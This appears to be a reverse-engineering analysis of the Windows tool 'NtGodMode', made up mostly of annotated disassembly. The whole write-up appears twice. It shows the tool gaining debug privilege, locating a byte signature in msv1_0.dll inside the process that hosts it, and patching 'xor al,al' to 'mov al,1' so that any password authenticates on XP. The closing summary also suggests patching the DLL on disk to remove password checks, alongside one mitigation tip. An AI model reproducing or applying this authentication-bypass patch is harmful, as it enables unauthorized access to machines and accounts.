by
/tools/200804/
9.00 KB (9,216 bytes) UPX shell, use Ollydbg to unshell, the process is brief
NtGodMode~.exe 120 KB (123,392 bytes) Viewed with PE tool, written by delphi
00403220 > 55 PUSH EBP
00403221 8BEC MOV EBP,ESP
00403223 B9 0D000000 MOV ECX,0D
00403228 6A 00 PUSH 0
0040322A 6A 00 PUSH 0
0040322C 49 DEC ECX
0040322D ^ 75 F9 JNZ SHORT NtGodMod.00403228
0040322F 51 PUSH ECX
00403230 53 PUSH EBX
00403231 56 PUSH ESI
00403232 57 PUSH EDI
00403233 A1 9C404000 MOV EAX,DWORD PTR DS:[40409C]
00403238 C600 01 MOV BYTE PTR DS:[EAX],1
0040323B B8 C0314000 MOV EAX,NtGodMod.004031C0
00403240 E8 13EEFFF CALL NtGodMod.00402058 //Get the handle of your own process (base address)
00403245 BB 60574000 MOV EBX,NtGodMod.00405760
0040324A 33C0 XOR EAX,EAX
0040324C 55 PUSH EBP
0040324D 68 80384000 PUSH NtGodMod.00403880
00403252 64:FF30 PUSH DWORD PTR FS:[EAX]
00403255 64:8920 MOV DWORD PTR FS:[EAX],ESP
00403258 E8 1BF2FFFF CALL NtGodMod.00402478
0040325D 48 DEC EAX
0040325E 7D 61 JGE SHORT NtGodMod.004032C1 // ->>004032C1
00403260 E8 4FFEFFFF CALL NtGodMod.004030B4
00403265 68 98384000 PUSH NtGodMod.00403898 ; ASCII "Usage: "
0040326A 8D55 E4 LEA EDX,DWORD PTR SS:[EBP-1C]
0040326D 33C0 XOR EAX,EAX
0040326F E8 F8F0FFFF CALL NtGodMod.0040236C
00403274 8B45 E4 MOV EAX,DWORD PTR SS:[EBP-1C]
00403277 8D55 E8 LEA EDX,DWORD PTR SS:[EBP-18]
0040327A E8 11F4FFFF CALL NtGodMod.00402690
0040327F FF75 E8 PUSH DWORD PTR SS:[EBP-18]
00403282 68 A8384000 PUSH NtGodMod.004038A8 ; ASCII " ON|OFF"
00403287 8D45 EC LEA EAX,DWORD PTR SS:[EBP-14]
0040328A BA 03000000 MOV EDX,3
0040328F E8 70E9FFFF CALL NtGodMod.00401C04
///////////////////////////////////////////////////////////////////////////////////////////////////
004032C1 A1 8C404000 MOV EAX,DWORD PTR DS:[40408C]
004032C6 E8 61EAFFFF CALL NtGodMod.00401D2C
004032CB 50 PUSH EAX //msv1_0.dll
004032CC E8 BFEEFFFF CALL <JMP.&> //LoadLibrary("msv1_0.dll")
004032D1 A3 4C574000 MOV DWORD PTR DS:[40574C],EAX //Save the base address of msv1_0.dll
004032D6 833D 4C574000 0>CMP DWORD PTR DS:[40574C],0
004032DD 0F84 82050000 JE NtGodMod.00403865
004032E3 33C0 XOR EAX,EAX
004032E5 A3 50574000 MOV DWORD PTR DS:[405750],EAX
004032EA A1 4C574000 MOV EAX,DWORD PTR DS:[40574C]
004032EF 8903 MOV DWORD PTR DS:[EBX],EAX
004032F1 33C0 XOR EAX,EAX
004032F3 55 PUSH EBP
004032F4 68 50334000 PUSH NtGodMod.00403350
004032F9 64:FF30 PUSH DWORD PTR FS:[EAX]
004032FC 64:8920 MOV DWORD PTR FS:[EAX],ESP
004032FF 8B03 MOV EAX,DWORD PTR DS:[EBX] //msv1_0.dll base address
00403301 8038 8B CMP BYTE PTR DS:[EAX],8B
00403304 75 1C JNZ SHORT NtGodMod.00403322
00403306 8B03 MOV EAX,DWORD PTR DS:[EBX]
00403308 40 INC EAX
00403309 8038 4D CMP BYTE PTR DS:[EAX],4D
0040330C 75 14 JNZ SHORT NtGodMod.00403322
0040330E 8B03 MOV EAX,DWORD PTR DS:[EBX]
00403310 83C0 02 ADD EAX,2
00403313 8038 0C CMP BYTE PTR DS:[EAX],0C
00403316 75 0A JNZ SHORT NtGodMod.00403322
00403318 8B03 MOV EAX,DWORD PTR DS:[EBX]
0040331A 83C0 03 ADD EAX,3
0040331D 8038 49 CMP BYTE PTR DS:[EAX],49 //Find 8B 4D 0C 49 in the msv1_0.dll space, this feature value
00403320 74 04 JE SHORT NtGodMod.00403326 //If found, continue to search in the subsequent space 32 C0
00403322 FF03 INC DWORD PTR DS:[EBX]
00403324 ^ EB D9 JMP SHORT NtGodMod.004032FF
00403326 8B03 MOV EAX,DWORD PTR DS:[EBX]
00403328 8038 32 CMP BYTE PTR DS:[EAX],32
0040332B 75 11 JNZ SHORT NtGodMod.0040333E
0040332D 8B03 MOV EAX,DWORD PTR DS:[EBX]
0040332F 40 INC EAX
00403330 8038 C0 CMP BYTE PTR DS:[EAX],0C0
00403333 75 09 JNZ SHORT NtGodMod.0040333E
00403335 8B03 MOV EAX,DWORD PTR DS:[EBX]
00403337 A3 50574000 MOV DWORD PTR DS:[405750],EAX //Save the address found [405750]
0040333C EB 04 JMP SHORT NtGodMod.00403342
0040333E FF03 INC DWORD PTR DS:[EBX] //Pointer add 1
00403340 ^ EB E4 JMP SHORT NtGodMod.00403326
00403342 33C0 XOR EAX,EAX
00403344 5A POP EDX
00403345 59 POP ECX
00403346 59 POP ECX
00403347 64:8910 MOV DWORD PTR FS:[EAX],EDX
0040334A 68 57334000 PUSH NtGodMod.00403357
0040334F C3 RETN
00403357 A1 50574000 MOV EAX,DWORD PTR DS:[405750]
0040335C 2B05 4C574000 SUB EAX,DWORD PTR DS:[40574C] //The address found above = msv1_0.dll base address, get the offset of the feature value
00403362 A3 50574000 MOV DWORD PTR DS:[405750],EAX //offset ->[405750]
00403367 A1 4C574000 MOV EAX,DWORD PTR DS:[40574C]
0040336C 50 PUSH EAX
0040336D E8 E6EDFFFF CALL <JMP.&>
00403372 C605 9C584000 0>MOV BYTE PTR DS:[40589C],0
00403379 C605 91584000 0>MOV BYTE PTR DS:[405891],0
00403380 C605 9D584000 0>MOV BYTE PTR DS:[40589D],0
00403387 E8 28FDFFF CALL NtGodMod.004030B4 //Show the author information
0040338C 8D55 DC LEA EDX,DWORD PTR SS:[EBP-24]
0040338F B8 02000000 MOV EAX,2
00403394 E8 D3EFFFFF CALL NtGodMod.0040236C
.
.
.
/////////////////////////////////////////////////////////////////////////////////////////////
//Elevate your own permissions to debug permissions
/tmp/
00402F1C 53 PUSH EBX ; NtGodMod.00405760
00402F1D 83C4 E8 ADD ESP,-18
00402F20 33DB XOR EBX,EBX
00402F22 54 PUSH ESP
00402F23 6A 28 PUSH 28
00402F25 E8 3EF2FFFF CALL <JMP.&>
00402F2A 50 PUSH EAX
00402F2B E8 F8F1FFFF CALL <JMP.&>
00402F30 8D4424 0C LEA EAX,DWORD PTR SS:[ESP+C]
00402F34 50 PUSH EAX
00402F35 68 7C2F4000 PUSH NtGodMod.00402F7C ; ASCII "SeDebugPrivilege"
00402F3A 6A 00 PUSH 0
00402F3C E8 DFF1FFFF CALL <JMP.&>
00402F41 85C0 TEST EAX,EAX
00402F43 74 30 JE SHORT NtGodMod.00402F75
00402F45 C74424 08 01000>MOV DWORD PTR SS:[ESP+8],1
00402F4D C74424 14 02000>MOV DWORD PTR SS:[ESP+14],2
00402F55 8D4424 04 LEA EAX,DWORD PTR SS:[ESP+4]
00402F59 50 PUSH EAX
00402F5A 6A 00 PUSH 0
00402F5C 6A 10 PUSH 10
00402F5E 8D4424 14 LEA EAX,DWORD PTR SS:[ESP+14]
00402F62 50 PUSH EAX
00402F63 6A 00 PUSH 0
00402F65 8B4424 14 MOV EAX,DWORD PTR SS:[ESP+14]
00402F69 50 PUSH EAX
00402F6A E8 A9F1FFFF CALL <JMP.&>
00402F6F 83F8 01 CMP EAX,1
00402F72 1BDB SBB EBX,EBX
00402F74 43 INC EBX
00402F75 8BC3 MOV EAX,EBX
00402F77 83C4 18 ADD ESP,18
00402F7A 5B POP EBX
00402F7B C3 RETN
///////////////////////////////////////////////////////////////////////////////////////////////
.
.//This section is to get PID() through the process name, which is too long.
.
///////////////////////////////////////////////////////////////////////////////////////////////
/tmp/
0040358A 50 PUSH EAX
0040358B 6A 00 PUSH 0
0040358D 68 FF0F1F00 PUSH 1F0FFF
00403592 E8 01ECFFFF CALL <JMP.&>//Open %systemroot%\system32\process
00403597 8BF0 MOV ESI,EAX
00403599 85F6 TEST ESI,ESI
0040359B 75 1E JNZ SHORT NtGodMod.004035BB
0040359D A1 98404000 MOV EAX,DWORD PTR DS:[404098]
004035A2 BA 10394000 MOV EDX,NtGodMod.00403910 ; ASCII "Sorry. I can't DO more."
004035A7 E8 78E8FFFF CALL NtGodMod.00401E24
004035AC E8 6FE1FFFF CALL NtGodMod.00401720
004035B1 E8 3EDCFFFF CALL NtGodMod.004011F4
004035B6 E9 AA020000 JMP NtGodMod.00403865
004035BB B8 A0584000 MOV EAX,NtGodMod.004058A0
004035C0 BA 00000100 MOV EDX,10000
004035C5 E8 0EECFFFF CALL NtGodMod.004021D8
004035CA 68 A0584100 PUSH NtGodMod.004158A0
004035CF BA A0584000 MOV EDX,NtGodMod.004058A0
004035D4 B9 00000100 MOV ECX,10000
004035D9 8BC6 MOV EAX,ESI
004035DB E8 A4F8FFFF CALL NtGodMod.00402E84
004035E0 8B3D A0584100 MOV EDI,DWORD PTR DS:[4158A0]
004035E6 4F DEC EDI
004035E7 85FF TEST EDI,EDI
004035E9 0F82 D6000000 JB NtGodMod.004036C5
004035EF 47 INC EDI
004035F0 C705 58574000 0>MOV DWORD PTR DS:[405758],0
004035FA BB A0584000 MOV EBX,NtGodMod.004058A0
004035FF 833B 00 CMP DWORD PTR DS:[EBX],0
00403602 0F84 BD000000 JE NtGodMod.004036C5
00403608 C705 A4584100 C>MOV DWORD PTR DS:[4158A4],0C8
00403612 A1 A4584100 MOV EAX,DWORD PTR DS:[4158A4]
00403617 50 PUSH EAX
00403618 B9 A8584100 MOV ECX,NtGodMod.004158A8
0040361D 8B13 MOV EDX,DWORD PTR DS:[EBX]
0040361F 8BC6 MOV EAX,ESI
00403621 E8 8EF8FFFF CALL NtGodMod.00402EB4
///////////////////////////////////////////////////////////////////////////////////////////////////
/tmp/
00403732 68 5C574000 PUSH NtGodMod.0040575C
00403737 6A 40 PUSH 40
00403739 6A 02 PUSH 2
0040373B A1 50574000 MOV EAX,DWORD PTR DS:[405750]
00403740 50 PUSH EAX
00403741 56 PUSH ESI
00403742 E8 79EAFFFF CALL <JMP.&>
00403747 68 98584000 PUSH NtGodMod.00405898
0040374C 6A 02 PUSH 2
0040374E 68 90404000 PUSH NtGodMod.00404090
00403753 A1 50574000 MOV EAX,DWORD PTR DS:[405750]
00403758 50 PUSH EAX
00403759 56 PUSH ESI
0040375A E8 69EAFFFF CALL <JMP.&> //32C0 xor al,al is modified to B001 mov al,1
0040375F B0 04 MOV AL,4
00403761 E8 DEEFFFFF CALL NtGodMod.00402744
00403766 A1 98404000 MOV EAX,DWORD PTR DS:[404098]
0040376B BA 70394000 MOV EDX,NtGodMod.00403970 ; ASCII "Open God Mode!"
00403770 E8 AFE6FFFF CALL NtGodMod.00401E24
00403775 E8 A6DFFFFF CALL NtGodMod.00401720
0040377A E8 75DAFFFF CALL NtGodMod.004011F4
0040377F 33C0 XOR EAX,EAX
00403781 E8 BEEFFFFF CALL NtGodMod.00402744
00403786 EB 54 JMP SHORT NtGodMod.004037DC
00403788 68 5C574000 PUSH NtGodMod.0040575C
0040378D 6A 40 PUSH 40
0040378F 6A 02 PUSH 2
00403791 A1 50574000 MOV EAX,DWORD PTR DS:[405750]
00403796 50 PUSH EAX
00403797 56 PUSH ESI
00403798 E8 23EAFFFF CALL <JMP.&>
0040379D 68 98584000 PUSH NtGodMod.00405898
004037A2 6A 02 PUSH 2
004037A4 68 94404000 PUSH NtGodMod.00404094
004037A9 A1 50574000 MOV EAX,DWORD PTR DS:[405750]
004037AE 50 PUSH EAX
004037AF 56 PUSH ESI
004037B0 E8 13EAFFFF CALL <JMP.&>
004037B5 B0 07 MOV AL,7
004037B7 E8 88EFFFFF CALL NtGodMod.00402744
004037BC A1 98404000 MOV EAX,DWORD PTR DS:[404098]
004037C1 BA 88394000 MOV EDX,NtGodMod.00403988 ; ASCII "Close God Mode!"
004037C6 E8 59E6FFFF CALL NtGodMod.00401E24
004037CB E8 50DFFFFF CALL NtGodMod.00401720
004037D0 E8 1FDAFFFF CALL NtGodMod.004011F4
004037D5 33C0 XOR EAX,EAX
004037D7 E8 68EFFFFF CALL NtGodMod.00402744
004037DC 6A 00 PUSH 0
004037DE 6A 00 PUSH 0
004037E0 56 PUSH ESI
004037E1 E8 6AE9FFFF CALL <JMP.&>
summary
It is by opening the module space of the process msv1_0.dll, and then searching for the first 32 C0 after the feature value 8B 4D 0C 49
This 32C0 assembly code xor al,al, is modified to B001 corresponding assembly code mov al,1
Why don’t mov al,1, use password in the future? Interested students can install a virtual machine and adjust it
This program does not work on my own machine win2k sp4. I followed it and mainly searched for which feature value above it is not universal.
xp sp2 xp sp3 both work.
In addition, if you want to immunize your machine, it is actually very simple to control panel -> Management Tools -> Local Security Policy -> Local Policy -> User Rights Assignment -> Debug Program
There is an admin user inside. After deleting it, the code that increases its own permissions is very old, poor, and weak, and will be invalid.
In fact, this thing needs to be used in this way. Through programming methods, turn off the system file protection and directly change the PE file msv1_0.dll, so that the machine does not need a password. Then, if many machines are used to access shared files, it is also convenient for the computer to be people-oriented.
Finally, let’s say that what Delphi writes is not good, there is too much garbage~!!
/tmp/
/tools/200804/
9.00 KB (9,216 bytes) UPX shell, use Ollydbg to unshell, the process is brief
NtGodMode~.exe 120 KB (123,392 bytes) Viewed with PE tool, written by delphi
00403220 > 55 PUSH EBP
00403221 8BEC MOV EBP,ESP
00403223 B9 0D000000 MOV ECX,0D
00403228 6A 00 PUSH 0
0040322A 6A 00 PUSH 0
0040322C 49 DEC ECX
0040322D ^ 75 F9 JNZ SHORT NtGodMod.00403228
0040322F 51 PUSH ECX
00403230 53 PUSH EBX
00403231 56 PUSH ESI
00403232 57 PUSH EDI
00403233 A1 9C404000 MOV EAX,DWORD PTR DS:[40409C]
00403238 C600 01 MOV BYTE PTR DS:[EAX],1
0040323B B8 C0314000 MOV EAX,NtGodMod.004031C0
00403240 E8 13EEFFF CALL NtGodMod.00402058 //Get the handle of your own process (base address)
00403245 BB 60574000 MOV EBX,NtGodMod.00405760
0040324A 33C0 XOR EAX,EAX
0040324C 55 PUSH EBP
0040324D 68 80384000 PUSH NtGodMod.00403880
00403252 64:FF30 PUSH DWORD PTR FS:[EAX]
00403255 64:8920 MOV DWORD PTR FS:[EAX],ESP
00403258 E8 1BF2FFFF CALL NtGodMod.00402478
0040325D 48 DEC EAX
0040325E 7D 61 JGE SHORT NtGodMod.004032C1 // ->>004032C1
00403260 E8 4FFEFFFF CALL NtGodMod.004030B4
00403265 68 98384000 PUSH NtGodMod.00403898 ; ASCII "Usage: "
0040326A 8D55 E4 LEA EDX,DWORD PTR SS:[EBP-1C]
0040326D 33C0 XOR EAX,EAX
0040326F E8 F8F0FFFF CALL NtGodMod.0040236C
00403274 8B45 E4 MOV EAX,DWORD PTR SS:[EBP-1C]
00403277 8D55 E8 LEA EDX,DWORD PTR SS:[EBP-18]
0040327A E8 11F4FFFF CALL NtGodMod.00402690
0040327F FF75 E8 PUSH DWORD PTR SS:[EBP-18]
00403282 68 A8384000 PUSH NtGodMod.004038A8 ; ASCII " ON|OFF"
00403287 8D45 EC LEA EAX,DWORD PTR SS:[EBP-14]
0040328A BA 03000000 MOV EDX,3
0040328F E8 70E9FFFF CALL NtGodMod.00401C04
///////////////////////////////////////////////////////////////////////////////////////////////////
004032C1 A1 8C404000 MOV EAX,DWORD PTR DS:[40408C]
004032C6 E8 61EAFFFF CALL NtGodMod.00401D2C
004032CB 50 PUSH EAX //msv1_0.dll
004032CC E8 BFEEFFFF CALL <JMP.&> //LoadLibrary("msv1_0.dll")
004032D1 A3 4C574000 MOV DWORD PTR DS:[40574C],EAX //Save the base address of msv1_0.dll
004032D6 833D 4C574000 0>CMP DWORD PTR DS:[40574C],0
004032DD 0F84 82050000 JE NtGodMod.00403865
004032E3 33C0 XOR EAX,EAX
004032E5 A3 50574000 MOV DWORD PTR DS:[405750],EAX
004032EA A1 4C574000 MOV EAX,DWORD PTR DS:[40574C]
004032EF 8903 MOV DWORD PTR DS:[EBX],EAX
004032F1 33C0 XOR EAX,EAX
004032F3 55 PUSH EBP
004032F4 68 50334000 PUSH NtGodMod.00403350
004032F9 64:FF30 PUSH DWORD PTR FS:[EAX]
004032FC 64:8920 MOV DWORD PTR FS:[EAX],ESP
004032FF 8B03 MOV EAX,DWORD PTR DS:[EBX] //msv1_0.dll base address
00403301 8038 8B CMP BYTE PTR DS:[EAX],8B
00403304 75 1C JNZ SHORT NtGodMod.00403322
00403306 8B03 MOV EAX,DWORD PTR DS:[EBX]
00403308 40 INC EAX
00403309 8038 4D CMP BYTE PTR DS:[EAX],4D
0040330C 75 14 JNZ SHORT NtGodMod.00403322
0040330E 8B03 MOV EAX,DWORD PTR DS:[EBX]
00403310 83C0 02 ADD EAX,2
00403313 8038 0C CMP BYTE PTR DS:[EAX],0C
00403316 75 0A JNZ SHORT NtGodMod.00403322
00403318 8B03 MOV EAX,DWORD PTR DS:[EBX]
0040331A 83C0 03 ADD EAX,3
0040331D 8038 49 CMP BYTE PTR DS:[EAX],49 //Find 8B 4D 0C 49 in the msv1_0.dll space, this feature value
00403320 74 04 JE SHORT NtGodMod.00403326 //If found, continue to search in the subsequent space 32 C0
00403322 FF03 INC DWORD PTR DS:[EBX]
00403324 ^ EB D9 JMP SHORT NtGodMod.004032FF
00403326 8B03 MOV EAX,DWORD PTR DS:[EBX]
00403328 8038 32 CMP BYTE PTR DS:[EAX],32
0040332B 75 11 JNZ SHORT NtGodMod.0040333E
0040332D 8B03 MOV EAX,DWORD PTR DS:[EBX]
0040332F 40 INC EAX
00403330 8038 C0 CMP BYTE PTR DS:[EAX],0C0
00403333 75 09 JNZ SHORT NtGodMod.0040333E
00403335 8B03 MOV EAX,DWORD PTR DS:[EBX]
00403337 A3 50574000 MOV DWORD PTR DS:[405750],EAX //Save the address found [405750]
0040333C EB 04 JMP SHORT NtGodMod.00403342
0040333E FF03 INC DWORD PTR DS:[EBX] //Pointer add 1
00403340 ^ EB E4 JMP SHORT NtGodMod.00403326
00403342 33C0 XOR EAX,EAX
00403344 5A POP EDX
00403345 59 POP ECX
00403346 59 POP ECX
00403347 64:8910 MOV DWORD PTR FS:[EAX],EDX
0040334A 68 57334000 PUSH NtGodMod.00403357
0040334F C3 RETN
00403357 A1 50574000 MOV EAX,DWORD PTR DS:[405750]
0040335C 2B05 4C574000 SUB EAX,DWORD PTR DS:[40574C] //The address found above = msv1_0.dll base address, get the offset of the feature value
00403362 A3 50574000 MOV DWORD PTR DS:[405750],EAX //offset ->[405750]
00403367 A1 4C574000 MOV EAX,DWORD PTR DS:[40574C]
0040336C 50 PUSH EAX
0040336D E8 E6EDFFFF CALL <JMP.&>
00403372 C605 9C584000 0>MOV BYTE PTR DS:[40589C],0
00403379 C605 91584000 0>MOV BYTE PTR DS:[405891],0
00403380 C605 9D584000 0>MOV BYTE PTR DS:[40589D],0
00403387 E8 28FDFFF CALL NtGodMod.004030B4 //Show the author information
0040338C 8D55 DC LEA EDX,DWORD PTR SS:[EBP-24]
0040338F B8 02000000 MOV EAX,2
00403394 E8 D3EFFFFF CALL NtGodMod.0040236C
.
.
.
/////////////////////////////////////////////////////////////////////////////////////////////
//Elevate your own permissions to debug permissions
/tmp/
00402F1C 53 PUSH EBX ; NtGodMod.00405760
00402F1D 83C4 E8 ADD ESP,-18
00402F20 33DB XOR EBX,EBX
00402F22 54 PUSH ESP
00402F23 6A 28 PUSH 28
00402F25 E8 3EF2FFFF CALL <JMP.&>
00402F2A 50 PUSH EAX
00402F2B E8 F8F1FFFF CALL <JMP.&>
00402F30 8D4424 0C LEA EAX,DWORD PTR SS:[ESP+C]
00402F34 50 PUSH EAX
00402F35 68 7C2F4000 PUSH NtGodMod.00402F7C ; ASCII "SeDebugPrivilege"
00402F3A 6A 00 PUSH 0
00402F3C E8 DFF1FFFF CALL <JMP.&>
00402F41 85C0 TEST EAX,EAX
00402F43 74 30 JE SHORT NtGodMod.00402F75
00402F45 C74424 08 01000>MOV DWORD PTR SS:[ESP+8],1
00402F4D C74424 14 02000>MOV DWORD PTR SS:[ESP+14],2
00402F55 8D4424 04 LEA EAX,DWORD PTR SS:[ESP+4]
00402F59 50 PUSH EAX
00402F5A 6A 00 PUSH 0
00402F5C 6A 10 PUSH 10
00402F5E 8D4424 14 LEA EAX,DWORD PTR SS:[ESP+14]
00402F62 50 PUSH EAX
00402F63 6A 00 PUSH 0
00402F65 8B4424 14 MOV EAX,DWORD PTR SS:[ESP+14]
00402F69 50 PUSH EAX
00402F6A E8 A9F1FFFF CALL <JMP.&>
00402F6F 83F8 01 CMP EAX,1
00402F72 1BDB SBB EBX,EBX
00402F74 43 INC EBX
00402F75 8BC3 MOV EAX,EBX
00402F77 83C4 18 ADD ESP,18
00402F7A 5B POP EBX
00402F7B C3 RETN
///////////////////////////////////////////////////////////////////////////////////////////////
.
.//This section is to get PID() through the process name, which is too long.
.
///////////////////////////////////////////////////////////////////////////////////////////////
/tmp/
0040358A 50 PUSH EAX
0040358B 6A 00 PUSH 0
0040358D 68 FF0F1F00 PUSH 1F0FFF
00403592 E8 01ECFFFF CALL <JMP.&>//Open %systemroot%\system32\process
00403597 8BF0 MOV ESI,EAX
00403599 85F6 TEST ESI,ESI
0040359B 75 1E JNZ SHORT NtGodMod.004035BB
0040359D A1 98404000 MOV EAX,DWORD PTR DS:[404098]
004035A2 BA 10394000 MOV EDX,NtGodMod.00403910 ; ASCII "Sorry. I can't DO more."
004035A7 E8 78E8FFFF CALL NtGodMod.00401E24
004035AC E8 6FE1FFFF CALL NtGodMod.00401720
004035B1 E8 3EDCFFFF CALL NtGodMod.004011F4
004035B6 E9 AA020000 JMP NtGodMod.00403865
004035BB B8 A0584000 MOV EAX,NtGodMod.004058A0
004035C0 BA 00000100 MOV EDX,10000
004035C5 E8 0EECFFFF CALL NtGodMod.004021D8
004035CA 68 A0584100 PUSH NtGodMod.004158A0
004035CF BA A0584000 MOV EDX,NtGodMod.004058A0
004035D4 B9 00000100 MOV ECX,10000
004035D9 8BC6 MOV EAX,ESI
004035DB E8 A4F8FFFF CALL NtGodMod.00402E84
004035E0 8B3D A0584100 MOV EDI,DWORD PTR DS:[4158A0]
004035E6 4F DEC EDI
004035E7 85FF TEST EDI,EDI
004035E9 0F82 D6000000 JB NtGodMod.004036C5
004035EF 47 INC EDI
004035F0 C705 58574000 0>MOV DWORD PTR DS:[405758],0
004035FA BB A0584000 MOV EBX,NtGodMod.004058A0
004035FF 833B 00 CMP DWORD PTR DS:[EBX],0
00403602 0F84 BD000000 JE NtGodMod.004036C5
00403608 C705 A4584100 C>MOV DWORD PTR DS:[4158A4],0C8
00403612 A1 A4584100 MOV EAX,DWORD PTR DS:[4158A4]
00403617 50 PUSH EAX
00403618 B9 A8584100 MOV ECX,NtGodMod.004158A8
0040361D 8B13 MOV EDX,DWORD PTR DS:[EBX]
0040361F 8BC6 MOV EAX,ESI
00403621 E8 8EF8FFFF CALL NtGodMod.00402EB4
///////////////////////////////////////////////////////////////////////////////////////////////////
/tmp/
00403732 68 5C574000 PUSH NtGodMod.0040575C
00403737 6A 40 PUSH 40
00403739 6A 02 PUSH 2
0040373B A1 50574000 MOV EAX,DWORD PTR DS:[405750]
00403740 50 PUSH EAX
00403741 56 PUSH ESI
00403742 E8 79EAFFFF CALL <JMP.&>
00403747 68 98584000 PUSH NtGodMod.00405898
0040374C 6A 02 PUSH 2
0040374E 68 90404000 PUSH NtGodMod.00404090
00403753 A1 50574000 MOV EAX,DWORD PTR DS:[405750]
00403758 50 PUSH EAX
00403759 56 PUSH ESI
0040375A E8 69EAFFFF CALL <JMP.&> //32C0 xor al,al is modified to B001 mov al,1
0040375F B0 04 MOV AL,4
00403761 E8 DEEFFFFF CALL NtGodMod.00402744
00403766 A1 98404000 MOV EAX,DWORD PTR DS:[404098]
0040376B BA 70394000 MOV EDX,NtGodMod.00403970 ; ASCII "Open God Mode!"
00403770 E8 AFE6FFFF CALL NtGodMod.00401E24
00403775 E8 A6DFFFFF CALL NtGodMod.00401720
0040377A E8 75DAFFFF CALL NtGodMod.004011F4
0040377F 33C0 XOR EAX,EAX
00403781 E8 BEEFFFFF CALL NtGodMod.00402744
00403786 EB 54 JMP SHORT NtGodMod.004037DC
00403788 68 5C574000 PUSH NtGodMod.0040575C
0040378D 6A 40 PUSH 40
0040378F 6A 02 PUSH 2
00403791 A1 50574000 MOV EAX,DWORD PTR DS:[405750]
00403796 50 PUSH EAX
00403797 56 PUSH ESI
00403798 E8 23EAFFFF CALL <JMP.&>
0040379D 68 98584000 PUSH NtGodMod.00405898
004037A2 6A 02 PUSH 2
004037A4 68 94404000 PUSH NtGodMod.00404094
004037A9 A1 50574000 MOV EAX,DWORD PTR DS:[405750]
004037AE 50 PUSH EAX
004037AF 56 PUSH ESI
004037B0 E8 13EAFFFF CALL <JMP.&>
004037B5 B0 07 MOV AL,7
004037B7 E8 88EFFFFF CALL NtGodMod.00402744
004037BC A1 98404000 MOV EAX,DWORD PTR DS:[404098]
004037C1 BA 88394000 MOV EDX,NtGodMod.00403988 ; ASCII "Close God Mode!"
004037C6 E8 59E6FFFF CALL NtGodMod.00401E24
004037CB E8 50DFFFFF CALL NtGodMod.00401720
004037D0 E8 1FDAFFFF CALL NtGodMod.004011F4
004037D5 33C0 XOR EAX,EAX
004037D7 E8 68EFFFFF CALL NtGodMod.00402744
004037DC 6A 00 PUSH 0
004037DE 6A 00 PUSH 0
004037E0 56 PUSH ESI
004037E1 E8 6AE9FFFF CALL <JMP.&>
summary
It is by opening the module space of the process msv1_0.dll, and then searching for the first 32 C0 after the feature value 8B 4D 0C 49
This 32C0 assembly code xor al,al, is modified to B001 corresponding assembly code mov al,1
Why don’t mov al,1, use password in the future? Interested students can install a virtual machine and adjust it
This program does not work on my own machine win2k sp4. I followed it and mainly searched for which feature value above it is not universal.
xp sp2 xp sp3 both work.
In addition, if you want to immunize your machine, it is actually very simple to control panel -> Management Tools -> Local Security Policy -> Local Policy -> User Rights Assignment -> Debug Program
There is an admin user inside. After deleting it, the code that increases its own permissions is very old, poor, and weak, and will be invalid.
In fact, this thing needs to be used in this way. Through programming methods, turn off the system file protection and directly change the PE file msv1_0.dll, so that the machine does not need a password. Then, if many machines are used to access shared files, it is also convenient for the computer to be people-oriented.
Finally, let’s say that what Delphi writes is not good, there is too much garbage~!!
/tmp/